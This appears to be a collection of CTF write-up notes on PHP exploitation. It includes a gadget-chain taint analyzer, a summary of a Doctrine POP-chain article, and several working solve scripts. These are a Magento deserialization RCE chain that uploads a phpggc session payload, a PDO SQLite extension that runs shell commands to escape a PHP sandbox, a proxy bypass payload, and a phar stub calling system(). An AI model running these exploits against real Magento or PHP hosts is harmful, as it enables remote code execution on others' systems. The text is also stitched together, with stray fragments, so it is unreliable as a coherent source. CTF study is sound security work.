print(f" ✓ Found {len(walker.calls)} call sites")
print(f" ✓ Found {len(walker.property_accesses)} property accesses\n")
# Perform taint analysis
print("🔬 Performing taint analysis...")
analyzer = AdvancedTaintAnalyzer(walker)
chains = analyzer.analyze(stream_output=stream_output)
return chains
def analyze_file(self, filepath: str, stream_output: bool = True) -> List[GadgetChain]:
"""Analyze single PHP file"""
print(f"\n📄 Analyzing file: {filepath}\n")
parsed = self.parser.parse_file(filepath)
if not parsed['success']:
print(f"❌ Failed to parse: {parsed.get('error')}")
return []
walker = ASTWalker()
walker.walk(parsed)
print(f" ✓ Found {len(walker.classes)} classes")
print(f" ✓ Found {len(walker.methods)} methods\n")
print("🔬 Performing taint analysis...")
analyzer = AdvancedTaintAnalyzer(walker)
chains = analyzer.analyze(stream_output=stream_output)
return chains
def _find_php_files(self, directory: str, recursive: bool) -> List[str]:
"""Find all PHP files"""
php_files = []
path = Path(directory)
if not path.exists():
print(f"❌ Error: Directory '{directory}' does not exist")
return []
if not path.is_dir():
print(f"❌ Error: '{directory}' is not a directory")
return []
if recursive:
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith('.php'):
php_files.append(os.path.join(root, file))
else:
php_files = [str(f) for f in path.glob('*.php') if f.is_file()]
return sorted(php_files)
def main():
parser = argparse.ArgumentParser(
description='Advanced PHP Gadget Chain Taint Analyzer',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -d /path/to/php/project -r
%(prog)s -f vulnerable.php -o json
%(prog)s -d /var/www --min-confidence 0.7 --min-severity HIGH
Requirements:
pip install php-ast
Note: php-ast requires PHP with the ast extension enabled.
See: https://github.com/nikic/php-ast
"""
)
parser.add_argument('-d', '--directory', help='Directory to analyze')
parser.add_argument('-f', '--file', help='Single file to analyze')
parser.add_argument('-r', '--recursive', action='store_true',
help='Recursively scan directory')
parser.add_argument('-o', '--output', choices=['text', 'json'],
default='text', help='Output format (default: text)')
parser.add_argument('--min-confidence', type=float, default=0.0,
help='Minimum confidence threshold (0.0-1.0)')
parser.add_argument('--min-severity',
choices=['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'],
help='Minimum severity level')
parser.add_argument('--show-all', action='store_true',
help='Show all chains including low confidence')
parser.add_argument('--no-stream', action='store_true',
help='Disable streaming output (show all results at end)')
parser.add_argument('--summary-only', action='store_true',
help='Show only summary, not full details')
args = parser.parse_args()
if not args.directory and not args.file:
parser.error('Either --directory or --file must be specified')
# Check if php-ast is available
if not PHP_AST_AVAILABLE:
print("\n❌ Error: php-ast module is not installed")
print("\nInstallation instructions:")
print(" 1. Install PHP ast extension:")
print(" - Ubuntu/Debian: sudo apt-get install php-ast")
print(" - Or compile from source: https://github.com/nikic/php-ast")
print(" 2. Install Python package:")
print(" pip install php-ast")
sys.exit(1)
analyzer = GadgetChainAnalyzer()
# Perform analysis
try:
stream_output = not args.no_stream
if args.directory:
chains = analyzer.analyze_directory(args.directory, args.recursive, stream_output)
else:
chains = analyzer.analyze_file(args.file, stream_output)
except KeyboardInterrupt:
print("\n\n⚠️ Analysis interrupted by user")
sys.exit(1)
except Exception as e:
print(f"\n❌ Error during analysis: {e}")
import traceback
traceback.print_exc()
sys.exit(1)
# Filter chains
filtered_chains = chains
if not args.show_all:
# Default minimum confidence
min_conf = args.min_confidence
filtered_chains = [c for c in filtered_chains if c.confidence >= min_conf]
elif args.min_confidence > 0:
filtered_chains = [c for c in filtered_chains if c.confidence >= args.min_confidence]
if args.min_severity:
min_level = TaintLevel[args.min_severity]
filtered_chains = [c for c in filtered_chains if c.severity.value >= min_level.value]
# Generate report
analyzer.reporter.add_chains(filtered_chains)
if args.output == 'json':
print(analyzer.reporter.generate_json_report())
elif args.summary_only:
# Just print summary
print("\n" + "="*100)
print(f"📊 FINAL SUMMARY: {len(filtered_chains)} chains detected")
print("="*100)
by_severity = defaultdict(int)
for chain in filtered_chains:
by_severity[chain.severity.name] += 1
print("\nSeverity Breakdown:")
for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
count = by_severity.get(severity, 0)
if count > 0:
emoji = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}.get(severity, '⚪')
print(f" {emoji} {severity}: {count}")
else:
# Only print full report if not streaming (to avoid duplication)
if args.no_stream:
print(analyzer.reporter.generate_text_report())
else:
# Just print summary since we already showed details
print("\n" + "="*100)
print("📊 SUMMARY OF ALL DETECTED CHAINS")
print("="*100)
# Group by severity
sorted_chains = sorted(filtered_chains, key=lambda c: (c.severity.value, c.confidence), reverse=True)
current_severity = None
for chain in sorted_chains:
if chain.severity.name != current_severity:
current_severity = chain.severity.name
emoji = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}.get(current_severity, '⚪')
print(f"\n{emoji} {current_severity} SEVERITY CHAINS")
print("-" * 100)
# Sink info
sink_file = chain.sink.filepath or 'Unknown'
print(f"Chain #{chain.chain_id:<3} | Conf: {chain.confidence:.0%} | Sink: {chain.sink.function}()")
print(f" Location: {sink_file}:{chain.sink.line}")
# Entry info
if chain.chain_path:
entry_step = chain.chain_path[0]
entry_method = entry_step.get('method', '?')
entry_file = entry_step.get('method_file', 'Unknown')
print(f" Entry: {entry_method} in {entry_file}:{entry_step.get('method_line', 0)}")
# Injectable info
if chain.injectable_objects:
objs = [o['class'] for o in chain.injectable_objects]
objs_str = ", ".join(objs[:2])
if len(objs) > 2:
objs_str += f" (+{len(objs)-2} more)"
print(f" Trigger: new {objs_str}")
# Flow
print(f" Flow:")
for i, step in enumerate(chain.chain_path, 1):
method = step.get('method', '?')
file_path = step.get('method_file', 'Unknown')
line_num = step.get('method_line', 0)
print(f" {i}. {method} in {file_path}:{line_num}")
print("")
print(f"💡 Use --no-stream for full details of all chains")
# Exit codes
if filtered_chains:
critical_chains = [c for c in filtered_chains if c.severity == TaintLevel.CRITICAL]
high_chains = [c for c in filtered_chains if c.severity == TaintLevel.HIGH]
if critical_chains:
print(f"\n⚠️ {len(critical_chains)} CRITICAL severity chain(s) found!")
sys.exit(2)
elif high_chains:
print(f"\n⚠️ {len(high_chains)} HIGH severity chain(s) found!")
sys.exit(1)
else:
sys.exit(1)
else:
print("\n✅ No significant vulnerabilities detected")
sys.exit(0)
if __name__ == '__main__':
main()Itended
they don’t yet upload the solver, but the author send this to the server as reference
https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1
the solver added Drupal RCE gadget chain · anzuukino/phpggc@d0ac1bc
TL;DR
Doctrine\Common\Cache\Psr6\CacheAdapter::__destruct(), which calls commit().commit() (e.g., get(), save(), delete()) can be redirected to attacker-controlled classes.delete() path can flow into PhpArrayAdapter::initialize() which uses a vulnerable include, allowing full RCE if the attacker can already write a file to disk (first prerequisite).Article Summary
The goal was to identify a valid POP chain inside the doctrine/doctrine-bundle dependency stack (downloaded 144M+ times). The research relies primarily on static analysis to identify a deserialization entrypoint and the sequence of method calls that lead to a vulnerable include.
Methodology Highlights
Search for PHP magic methods invoked automatically during deserialization, primarily __wakeup, __unserialize, and __destruct.
The deprecated but still-included class Doctrine\Common\Cache\Psr6\CacheAdapter was chosen because its __destruct() directly calls commit(). Many other Symfony classes defend against POP chains by throwing BadMethodCallException inside __wakeup() — CacheAdapter did not.
Inside commit(), code invokes methods such as getExpiry(), get(), save(), and delete() on properties like $this->cache and members of $this->deferredItems. Due to PHP’s weak typing, an attacker controlling the object graph produced from deserialization can make those properties reference attacker-controlled objects/classes.
The chain uses delete() to reach PhpArrayAdapter via CacheTrait::delete() → deleteItem() → PhpArrayAdapter::initialize(). The latter has an include of a file path that can be influenced if the attacker is able to write a file to disk — completing the RCE chain.
Impact
include in PhpArrayAdapter::initialize().Example Code and Analysis Snippets
Below are the key snippets and commands used during static analysis and chain construction.
1. Locating __destruct without __wakeup protection
Search the dependency tree for classes implementing __destruct, then filter out those whose __wakeup() defends by throwing BadMethodCallException:
# Search for classes implementing __destruct without a __wakeup protection
$ grep -rl '__destruct' | xargs grep -L BadMethodCallException
doctrine/cache/lib/Doctrine/Common/Cache/Psr6/CacheAdapter.php
# ... other results
2. The CacheAdapter entrypoint
CacheAdapter::__destruct() immediately calls commit() — a controllable jump-start for the POP chain:
<?php namespace Doctrine\Common\Cache\Psr6;
final class CacheAdapter implements CacheItemPoolInterface {
// [...]
public function __destruct() {
// This call is the start of the POP chain
$this->commit();
}
}
3. commit() — how attacker-controlled properties are used
Fields that an attacker can influence during deserialization:
<?php namespace Doctrine\Common\Cache\Psr6;
final class CacheAdapter implements CacheItemPoolInterface {
/** @var Cache */ // Controlled by the attacker
private $cache;
/** @var array<CacheItem|TypedCacheItem> */
private $deferredItems = []; // Controlled by the attacker
// [...]
public function commit(): bool {
// ... loop through $this->deferredItems
// Example interactions on controlled objects:
// [2] $byLifetime[(int) $lifetime][$key] = $item->get();
// [4] Final call that leads to RCE chain:
switch (count($expiredKeys)) {
case 0:
break;
case 1:
$this->cache->delete(current($expiredKeys)); // <--- chosen jump point
break;
default:
$this->doDeleteMultiple($expiredKeys);
break;
}
// [3] return $this->cache->save($key, $item->get(), (int) $lifetime);
// ...
}
}
4. The final link: delete() → trait → PhpArrayAdapter::initialize()
CacheTrait::delete() funnels into deleteItem(). When the implementation is PhpArrayAdapter, deleteItem() leads to PhpArrayAdapter::initialize() which contains an include on a filesystem path — the step that makes RCE possible if the attacker can place a file there.
# Showing the delete wrapper from the CacheTrait
$ cat ./symfony/cache-contracts/CacheTrait.php | grep 'function delete(' -A 3
public function delete(string $key): bool {
return $this->deleteItem($key);
}
(From there, tracing the concrete implementation of deleteItem() to PhpArrayAdapter::initialize() reveals the vulnerable include.)
Mitigations & Recommendations
unserialize() on untrusted input. Use safe serialization formats (JSON, msgpack with safe decoding) or data signing to ensure integrity.include paths, using open_basedir, or applying code-hardening tools that detect suspicious deserialization patterns.Closing notes
If you want, I can:
Which of those would you like next?
CVE Magento\Framework\Url and make taint analysis yourself
| Event Name | N1CTF 2025 |
| GitHub URL | - |
| Challenge Name | This challenge has been ruined |
Attachments
References
solution
This challenge has been ruined:
source点为可匿名访问的API,sink点为Magento\Framework\Url, API访问时解析JSON数据进行依赖注入,构建所有实现的依赖关系,使用构造器方法进行污点传播,写个脚本找出source到sink点的所有路径即可
from __future__ import annotations
import os
import re
import sys
import xml.etree.ElementTree as ET
from collections import deque
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
MAGENTO_ROOT = os.path.join(SCRIPT_DIR, "magento2-2.4.9-alpha3")
DI_LIST_PATH = os.path.join(SCRIPT_DIR, "dis.txt")
WEBAPIS_LIST_PATH = os.path.join(SCRIPT_DIR, "webapis.txt")
TARGET_CLASS = "Magento\\Framework\\Url"
CLASS_ROOTS = [
os.path.join(MAGENTO_ROOT, "app", "code"),
os.path.join(MAGENTO_ROOT, "lib", "internal"),
os.path.join(MAGENTO_ROOT, "vendor"),
os.path.join(MAGENTO_ROOT, "setup"),
os.path.join(MAGENTO_ROOT, "generated"),
os.path.join(MAGENTO_ROOT, "dev"),
]
PRIMITIVE_TYPES = {
"array",
"bool",
"boolean",
"callable",
"double",
"float",
"int",
"integer",
"iterable",
"mixed",
"object",
"resource",
"string",
"void",
"false",
"true",
"never",
}
@dataclass
class ClassInfo:
path: str
namespace: str
use_map: Dict[str, str]
parent: Optional[str]
constructor_deps: List[str]
source: str
@dataclass(frozen=True)
class Endpoint:
url: str
http_method: str
service_class: str
service_method: str
def load_di_mapping() -> Dict[str, str]:
mapping: Dict[str, str] = {}
if not os.path.exists(DI_LIST_PATH):
return mapping
with open(DI_LIST_PATH, "r", encoding="utf-8") as handle:
for raw_line in handle:
line = raw_line.strip()
if not line or line.startswith("#"):
continue
abs_path = os.path.normpath(os.path.join(SCRIPT_DIR, line))
if not os.path.isfile(abs_path):
continue
try:
tree = ET.parse(abs_path)
except ET.ParseError:
# Skip malformed fixtures (common under dev/tests).
continue
root = tree.getroot()
for pref in root.findall(".//preference"):
target = pref.attrib.get("type")
source = pref.attrib.get("for")
if target and source:
# Last writer wins, mirroring Magento DI behaviour.
mapping[source.lstrip("\\")] = target.lstrip("\\")
return mapping
def class_to_path(class_name: str) -> Optional[str]:
rel_path = class_name.replace("\\", os.sep) + ".php"
for root in CLASS_ROOTS:
candidate = os.path.join(root, rel_path)
if os.path.isfile(candidate):
return candidate
return None
def parse_use_statements(content: str) -> Dict[str, str]:
"""Extract `use` aliases from a PHP file."""
use_map: Dict[str, str] = {}
pattern = re.compile(r"^\s*use\s+([^;]+);", re.MULTILINE)
for match in pattern.finditer(content):
statement = match.group(1).strip()
if not statement or statement.startswith(("function ", "const ")):
continue
# Split multiple imports separated by commas at top-level.
segments = []
brace_depth = 0
current = []
for ch in statement:
if ch == "," and brace_depth == 0:
segment = "".join(current).strip()
if segment:
segments.append(segment)
current = []
continue
if ch == "{":
brace_depth += 1
elif ch == "}":
brace_depth = max(0, brace_depth - 1)
current.append(ch)
tail = "".join(current).strip()
if tail:
segments.append(tail)
for segment in segments:
if "{" in segment:
prefix, remainder = segment.split("{", 1)
prefix = prefix.strip().rstrip("\\")
remainder = remainder.rstrip("}")
for part in remainder.split(","):
part = part.strip()
if not part:
continue
full, alias = _extract_use_part(part)
full_name = "\\".join(
x for x in [prefix, full] if x
).strip("\\")
use_map[alias] = full_name
else:
full, alias = _extract_use_part(segment)
use_map[alias] = full
return use_map
def _extract_use_part(part: str) -> Tuple[str, str]:
pieces = part.split(" as ")
if len(pieces) == 2:
full_name = pieces[0].strip().lstrip("\\")
alias = pieces[1].strip()
else:
full_name = part.strip().lstrip("\\")
alias = full_name.split("\\")[-1]
return full_name, alias
def resolve_type(
type_name: str, namespace: str, use_map: Dict[str, str]
) -> Optional[str]:
if not type_name:
return None
type_name = type_name.strip()
type_name = type_name.lstrip("&").lstrip("?")
if not type_name or type_name.lower() in PRIMITIVE_TYPES:
return None
if "|" in type_name:
for part in type_name.split("|"):
part = part.strip()
if part.lower() == "null":
continue
resolved = resolve_type(part, namespace, use_map)
if resolved:
return resolved
return None
if type_name == "self":
return namespace
if type_name == "static":
return namespace
if type_name == "parent":
return None
if type_name.startswith("\\"):
return type_name.lstrip("\\")
if "\\" in type_name:
head, tail = type_name.split("\\", 1)
mapped = use_map.get(head)
if mapped:
return "\\".join([mapped, tail]).strip("\\")
return "\\".join([namespace, type_name]).strip("\\")
mapped = use_map.get(type_name)
if mapped:
return mapped
if namespace:
return f"{namespace}\\{type_name}"
return type_name
CLASS_INFO_CACHE: Dict[str, Optional[ClassInfo]] = {}
def get_class_info(class_name: str) -> Optional[ClassInfo]:
if class_name in CLASS_INFO_CACHE:
return CLASS_INFO_CACHE[class_name]
path = class_to_path(class_name)
if not path or not os.path.isfile(path):
CLASS_INFO_CACHE[class_name] = None
return None
try:
with open(path, "r", encoding="utf-8") as handle:
content = handle.read()
except UnicodeDecodeError:
with open(path, "r", encoding="latin-1") as handle:
content = handle.read()
namespace = ""
ns_match = re.search(r"namespace\s+([^;]+);", content)
if ns_match:
namespace = ns_match.group(1).strip()
use_map = parse_use_statements(content)
parent = None
class_pattern = re.compile(
r"(?:final\s+|abstract\s+)?class\s+(\w+)(?:\s+extends\s+([^\s\{]+))?",
re.MULTILINE,
)
class_match = class_pattern.search(content)
if class_match:
parent_raw = class_match.group(2)
if parent_raw:
parent = resolve_type(parent_raw.strip(), namespace, use_map)
deps: List[str] = []
ctor_pattern = re.compile(r"function\s+__construct\s*\((.*?)\)", re.DOTALL)
ctor_match = ctor_pattern.search(content)
if ctor_match:
params_str = ctor_match.group(1)
params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)
tokens: List[str] = []
current = []
depth = 0
for ch in params_clean:
if ch == "," and depth == 0:
token = "".join(current).strip()
if token:
tokens.append(token)
current = []
continue
if ch in ("(", "["):
depth += 1
elif ch in (")", "]"):
depth = max(0, depth - 1)
current.append(ch)
tail = "".join(current).strip()
if tail:
tokens.append(tail)
for token in tokens:
token = token.strip()
if not token:
continue
if "=" in token:
token = token.split("=", 1)[0].strip()
token = re.sub(
r"^(public|protected|private|final|readonly|static)\s+", "", token
)
# Extract type hint (everything before the variable name).
parts = token.split()
type_hint = None
for part in parts:
if part.startswith("&"):
continue
if part.startswith("..."):
continue
if part.startswith("$"):
break
type_hint = part
if not type_hint:
continue
resolved = resolve_type(type_hint, namespace, use_map)
if resolved:
deps.append(resolved)
info = ClassInfo(
path=path,
namespace=namespace,
use_map=use_map,
parent=parent,
constructor_deps=deps,
source=content,
)
CLASS_INFO_CACHE[class_name] = info
return info
def resolve_concretes(type_name: str, di_mapping: Dict[str, str]) -> List[str]:
queue: deque[str] = deque([type_name.lstrip("\\")])
visited: Set[str] = set()
concretes: Set[str] = set()
while queue:
current = queue.popleft()
if current in visited:
continue
visited.add(current)
target = di_mapping.get(current)
if target:
normalized = target.lstrip("\\")
if normalized not in visited:
queue.append(normalized)
continue
concretes.add(current)
return sorted(concretes)
def find_constructor_path(
start_class: str, di_mapping: Dict[str, str], target: str = TARGET_CLASS
) -> Optional[List[str]]:
normalized_start = start_class.lstrip("\\")
queue: deque[str] = deque([normalized_start])
parents: Dict[str, Optional[str]] = {normalized_start: None}
while queue:
current = queue.popleft()
if current == target:
path: List[str] = []
node: Optional[str] = current
while node is not None:
path.append(node)
node = parents[node]
path.reverse()
return path
info = get_class_info(current)
if not info:
continue
dependencies = list(info.constructor_deps)
if info.parent:
dependencies.append(info.parent)
for dep in dependencies:
dep_norm = dep.lstrip("\\")
candidate_types: Set[str] = {dep_norm}
if dep_norm.endswith("\\Proxy"):
candidate_types.add(dep_norm[:-6])
for candidate in candidate_types:
for concrete in resolve_concretes(candidate, di_mapping):
if concrete not in parents:
parents[concrete] = current
queue.append(concrete)
return None
def _parse_method_parameters(
info: ClassInfo, method_name: str
) -> Optional[List[Tuple[str, str]]]:
pattern = re.compile(
rf"function\s+{re.escape(method_name)}\s*\((.*?)\)",
re.IGNORECASE | re.DOTALL,
)
match = pattern.search(info.source)
if not match:
return None
params_str = match.group(1)
params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)
tokens: List[str] = []
current: List[str] = []
depth = 0
for ch in params_clean:
if ch == "," and depth == 0:
token = "".join(current).strip()
if token:
tokens.append(token)
current = []
continue
if ch in ("(", "["):
depth += 1
elif ch in (")", "]"):
depth = max(0, depth - 1)
current.append(ch)
tail = "".join(current).strip()
if tail:
tokens.append(tail)
results: List[Tuple[str, str]] = []
for token in tokens:
token = token.strip()
if not token:
continue
# Strip default assignments.
if "=" in token:
token = token.split("=", 1)[0].strip()
token = re.sub(
r"^(public|protected|private|final|readonly|static)\s+", "", token
)
name_match = re.search(r"\$([A-Za-z_][A-Za-z0-9_]*)", token)
if not name_match:
continue
param_name = name_match.group(1)
parts = token.split()
type_hint = None
for part in parts:
if part.startswith("&"):
continue
if part.startswith("..."):
continue
if part.startswith("$"):
break
type_hint = part
if not type_hint:
continue
resolved = resolve_type(type_hint, info.namespace, info.use_map)
if resolved:
results.append((param_name, resolved))
return results
def extract_method_parameters(class_name: str, method_name: str) -> List[Tuple[str, str]]:
queue: deque[str] = deque([class_name.lstrip("\\")])
visited: Set[str] = set()
while queue:
current = queue.popleft()
if current in visited:
continue
visited.add(current)
info = get_class_info(current)
if not info:
continue
params = _parse_method_parameters(info, method_name)
if params is not None:
return params
if info.parent:
queue.append(info.parent.lstrip("\\"))
return []
def load_webapi_sources() -> List[Endpoint]:
endpoints: List[Endpoint] = []
if not os.path.exists(WEBAPIS_LIST_PATH):
return endpoints
with open(WEBAPIS_LIST_PATH, "r", encoding="utf-8") as handle:
for raw_line in handle:
line = raw_line.strip()
if not line or line.startswith("#"):
continue
abs_path = os.path.normpath(os.path.join(SCRIPT_DIR, line))
if not os.path.isfile(abs_path):
continue
try:
tree = ET.parse(abs_path)
except ET.ParseError:
continue
root = tree.getroot()
for route in root.findall(".//route"):
service = route.find("service")
resources = route.find("resources")
if service is None or resources is None:
continue
if not any(
res.attrib.get("ref") == "anonymous"
for res in resources.findall("resource")
):
continue
service_class = service.attrib.get("class")
service_method = service.attrib.get("method")
if (
not service_class
or not service_method
or service_method == "DEFAULT"
):
continue
endpoints.append(
Endpoint(
url=route.attrib.get("url", ""),
http_method=route.attrib.get("method", ""),
service_class=service_class.lstrip("\\"),
service_method=service_method,
)
)
return endpoints
def main() -> int:
di_mapping = load_di_mapping()
endpoints = load_webapi_sources()
if not endpoints:
print("No anonymous web API endpoints detected; nothing to scan.")
return 0
hits: List[Tuple[Endpoint, List[List[str]]]] = []
for endpoint in endpoints:
endpoint_paths: List[List[str]] = []
seen_paths: Set[Tuple[str, ...]] = set()
service_concretes = resolve_concretes(endpoint.service_class, di_mapping)
for concrete in service_concretes:
params = extract_method_parameters(concrete, endpoint.service_method)
if not params:
continue
for param_name, param_type in params:
param_concretes = resolve_concretes(param_type, di_mapping)
if not param_concretes:
continue
for concrete_param in param_concretes:
path = find_constructor_path(concrete_param, di_mapping)
if not path:
continue
chain: List[str] = [f"${param_name}: {param_type}"]
if path[0] != param_type:
chain.append(path[0])
chain.extend(path[1:])
key = tuple(chain)
if key not in seen_paths:
seen_paths.add(key)
endpoint_paths.append(chain)
if endpoint_paths:
hits.append((endpoint, endpoint_paths))
if not hits:
print(
"No anonymous web API services reach Magento\\Framework\\Url via constructor injection."
)
return 0
hits.sort(
key=lambda item: (
item[0].http_method,
item[0].url,
item[0].service_class,
item[0].service_method,
)
)
for endpoint, paths in hits:
print(
f"{endpoint.http_method} {endpoint.url} :: "
f"{endpoint.service_class}::{endpoint.service_method}"
)
for idx, chain in enumerate(paths, 1):
print(f" Path {idx}:")
for node in chain:
print(f" -> {node}")
print()
return 0
if __name__ == "__main__":
sys.exit(main())
在所有路径中找了一条最短的路径,移除涉及payment类的路径,如下
POST /V1/guest-carts/:cartId/billing-address :: Magento\Quote\Api\GuestBillingAddressManagementInterface::assign
Path 1:
-> $address: Magento\Quote\Api\Data\AddressInterface
-> Magento\Quote\Model\Quote\Address
-> Magento\Directory\Helper\Data
-> Magento\Framework\App\Helper\Context
-> Magento\Backend\Model\Url
-> Magento\Framework\Url不难将这个指定session file的漏洞和已知文件上传漏洞串联起来,利用脚本如下
import requests
import os
target = 'http://60.205.163.215:32640'
FORMKEY = os.popen("cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1").read().strip()
SESSID = os.popen("cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 26 | head -n 1").read().strip()
print(f"[+] Using form_key: {FORMKEY}")
print(f"[+] Using session_id: {SESSID}")
# docker run --rm -v .:/mnt phpgc -se -pub -a Guzzle/FW1 /proc/self/cwd/index.php /mnt/payload.php > exp.sess
url = f"{target}/customer/address_file/upload"
files = {
'custom_attributes[country_id]': (f'sess_{SESSID}', open('exp.sess', 'rb'), 'application/octet-stream'),
}
data = {
'form_key': FORMKEY,
}
cookies = {
'form_key': FORMKEY,
}
response = requests.post(url, files=files, data=data, cookies=cookies)
print(response.text)
url = f"{target}/rest/default/V1/guest-carts/abc/billing-address"
data = {
"address": {
"directoryData": {
"context": {
"urlBuilder": {
"session": {
"sessionConfig": {
"savePath": f"media/customer_address/s/e"
}
}
}
}
}
}
}
response = requests.post(url, json=data, cookies={'PHPSESSID': SESSID})
print(response.text)
PHP Sandbox bypass using PDO SQLite
| Event Name | XCTF 2025 |
| GitHub URL | - |
| Challenge Name | i forgot the challenge name |
Attachments
References
tl;dr about the challenge
solution
import httpx
import asyncio
import subprocess
import base64
import os
URL = "http://localhost:12345/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url, timeout=10000)
def eval(self, code: str) -> str:
return self.c.get(
"/",
params={"eval": code}
)
class API(BaseAPI):
...
async def upload_base64_file(api: BaseAPI, b64_content: str, remote_path: str, chunk_size: int = 4000):
"""Upload base64 in 4-char-aligned chunks to a .b64 file, then decode once."""
if chunk_size % 4 != 0:
chunk_size -= (chunk_size % 4)
if chunk_size <= 0:
chunk_size = 4
b64_path = remote_path + '.b64'
total = len(b64_content)
first = True
for i in range(0, total, chunk_size):
chunk = b64_content[i:i+chunk_size]
php = (
"file_put_contents('%s','%s');echo 'ok';"
if first else
"file_put_contents('%s','%s',FILE_APPEND);echo 'ok';"
) % (b64_path, chunk)
r = await api.eval(php)
_ = r.text
first = False
decode = await api.eval(
"""
$b64 = file_get_contents('%s');
file_put_contents('%s', base64_decode($b64));
clearstatcache();
$s = @filesize('%s');
var_dump($s !== false ? ('size=' . $s) : 'size_error');
""" % (b64_path, remote_path, remote_path)
)
print(decode.text.strip())
def build_shared_object():
"""Build the shared object and return base64 encoded content"""
c_file = "hello.c"
so_file = "libhello_fd.so"
# Create the C source if it doesn't exist
if not os.path.exists(c_file):
c_source = '''#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3ext.h>
SQLITE_EXTENSION_INIT1
// Simple function that prints "Hello from shared object!"
static void hello_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
sqlite3_result_text(context, "Hello from shared object!", -1, SQLITE_STATIC);
}
// Function to execute system commands and return output
static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
if (argc < 1) {
sqlite3_result_error(context, "exec_function requires one argument", -1);
return;
}
const char *command = (const char*)sqlite3_value_text(argv[0]);
if (command == NULL) {
sqlite3_result_error(context, "exec_function: invalid command", -1);
return;
}
// Execute command and capture output
FILE *fp = popen(command, "r");
if (fp == NULL) {
sqlite3_result_error(context, "Failed to execute command", -1);
return;
}
char buffer[4096];
char output[8192] = "";
while (fgets(buffer, sizeof(buffer), fp) != NULL) {
strncat(output, buffer, sizeof(output) - strlen(output) - 1);
}
int exit_code = pclose(fp);
// If we got output, return it; otherwise return exit code info
if (strlen(output) > 0) {
sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
} else {
char result_str[128];
snprintf(result_str, sizeof(result_str), "Command executed with exit code: %d", exit_code);
sqlite3_result_text(context, result_str, -1, SQLITE_STATIC);
}
}
// Extension entry point
int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
SQLITE_EXTENSION_INIT2(pApi);
// Register our custom functions
sqlite3_create_function(db, "hello", 0, SQLITE_UTF8, 0, hello_function, 0, 0);
sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
return SQLITE_OK;
}'''
with open(c_file, 'w') as f:
f.write(c_source)
print(f"Created {c_file}")
# Compile the shared object
compile_cmd = [
"gcc",
"-shared",
"-fPIC",
"-o", so_file,
c_file,
"-lsqlite3"
]
try:
print(f"Compiling {c_file} into {so_file}...")
result = subprocess.run(compile_cmd, check=True, capture_output=True, text=True)
print(f"Successfully compiled {so_file}")
except subprocess.CalledProcessError as e:
print(f"Compilation failed: {e}")
print(f"Error output: {e.stderr}")
return None
except FileNotFoundError:
print("Error: gcc not found. Please install gcc to compile the shared object.")
return None
# Read and encode the shared object
try:
with open(so_file, 'rb') as f:
so_content = f.read()
return base64.b64encode(so_content).decode()
except Exception as e:
print(f"Error reading {so_file}: {e}")
return None
finally:
os.remove(c_file)
os.remove(so_file)
async def main():
api = API()
print("=== Building Shared Object ===")
# Build the shared object
payload_content = build_shared_object()
if not payload_content:
print("Failed to build shared object!")
return
print(f"Base64 content length: {len(payload_content)} characters")
print("=== Uploading and Executing ===")
# Upload the shared object in chunks to avoid 414
print("Uploading shared object in chunks...")
await upload_base64_file(api, payload_content, '/tmp/libhello_fd.so', chunk_size=4000)
# Load and test the extension
print("Loading extension and testing...")
res = await api.eval(r"""
error_reporting(-1);
try {
$db = new Pdo\Sqlite('sqlite::memory:');
$db->loadExtension('/tmp/libhello_fd.so');
var_dump("Extension loaded successfully");
// Test our custom functions
$result = $db->query("SELECT hello()")->fetchColumn();
var_dump("hello() result: " . $result);
// Test exec function with different commands
$commands = [
'cat /flag.txt',
];
foreach ($commands as $cmd) {
$exec_result = $db->query("SELECT exec_cmd('" . $cmd . "')")->fetchColumn();
var_dump("exec_cmd('" . $cmd . "'): " . $exec_result);
}
} catch (Throwable $e) {
var_dump("Error: " . $e->getMessage());
}
""")
print(res.text)
if __name__ == "__main__":
asyncio.run(main())Php trick
| Event Name | Line CTF 2025 |
| GitHub URL | - |
| Challenge Name | Restricted Proxy |
Attachments
References
solve
import httpx
import asyncio
from urllib.parse import quote
URL = "http://136.110.79.68:10002"
URL = "http://localhost:10002"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url)
def home_post(self, data):
return self.c.post("/", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
class API(BaseAPI):
...
async def main():
api = API()
q = quote(r"flag?cmd=(f)&fmt={0:[w:=iter(w)]}")
print(q)
res = await api.home_post("submit=1&host=nginx&path=get%0a¶ms="+q+"&token_header=:X-From-Restric&token=ted-Proxy:8007370437")
print(res.text)
if __name__ == "__main__":
asyncio.run(main())
Phar is still possible in php 8 if via include(…) and phar can be gziped and be payload.phar.gz and still work
| Event Name | DEADSEC 2025 |
| GitHub URL | - |
| Challenge Name | baby-web |
Attachments
References
<?php
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$stub = <<<'STUB'
<?php
system('/readflag');
__HALT_COMPILER();
?>
STUB;
$phar->setStub($stub);
$phar->addFromString('dummy.txt', 'dummy');
$phar->stopBuffering();
?>
gzip the payload. upload and include with /index.php?url=payload.phar.gz
PHP Mailer CVE 2016 with EXIM4
| Event Name | IERAE CTF 2025 |
| GitHub URL | - |
| Challenge Name | CokePHP |
References
